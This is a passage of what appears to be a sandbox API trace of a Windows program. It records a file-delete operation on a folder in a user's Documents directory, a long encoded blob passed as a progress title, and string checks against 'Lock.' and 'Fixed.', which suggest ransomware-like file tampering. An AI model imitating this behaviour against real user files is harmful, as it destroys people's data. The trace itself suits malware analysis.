lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ") | out: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\Documents\\Mpp4LjR5L7", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ")) returned 0 [0217.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x38545d8 | out: hHeap=0x2af0000) returned 1 [0217.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0217.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0217.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0217.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0217.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0217.401] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 1 [0217.402] TranslateMessage (lpMsg=0x8cf968) returned 0 [0217.402] DispatchMessageW (lpMsg=0x8cf968) returned 0x0 [0217.402] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0217.402] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0217.402] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0217.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0217.402] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0217.402] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0217.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0217.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0217.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0217.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0217.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0217.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0217.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0217.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0217.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0217.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0217.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0217.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0217.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0217.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="My Music", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0217.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y Music", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0217.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Music", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0217.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0217.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0217.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0217.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0217.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0217.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0217.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0217.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0217.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0217.403] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0217.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0217.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0217.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0217.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0217.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0217.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0217.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0217.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0217.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0217.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0217.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0217.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0217.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0217.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0217.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0217.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0217.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0217.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0217.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x12) returned 0x29f6f40 [0217.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0217.404] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="My Music", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0217.404] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y Music", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0217.404] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Music", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0217.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0217.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0217.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0217.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0217.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0217.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0217.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0217.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0217.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0217.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0217.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0217.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0217.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0217.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0217.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0217.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0217.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0217.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0217.404] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0217.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0217.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0217.405] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0217.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0217.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0217.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0217.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722a8 [0217.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0217.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0217.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0217.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0217.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0217.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0217.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0217.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0217.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0217.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0217.405] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0217.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0217.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0217.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab050 [0217.405] RtlAllocateHeap (HeapHandle=0x2af0000, 